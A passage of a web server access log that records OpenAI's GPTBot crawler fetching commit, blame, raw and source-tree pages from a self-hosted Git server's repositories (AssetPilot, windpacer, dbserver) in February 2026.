+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:14:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 54909] [Gzip 13.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10518] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:14:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" [Client 74.7.227.38] [Length 10719] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:14:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" [Client 74.7.227.38] [Length 10694] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" +[17/Feb/2026:14:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:14:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11235] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:14:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11232] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:14:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11665] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:14:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 16183] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:14:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 51951] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:14:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 212441] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:14:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 440335] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:14:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" +[17/Feb/2026:14:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11408] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11403] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10699] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" +[17/Feb/2026:14:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:14:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" +[17/Feb/2026:14:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" +[17/Feb/2026:14:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" +[17/Feb/2026:14:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" +[17/Feb/2026:14:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10407] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" +[17/Feb/2026:14:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10872] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:14:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10696] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:14:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:14:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11110] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:14:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11306] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11875] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 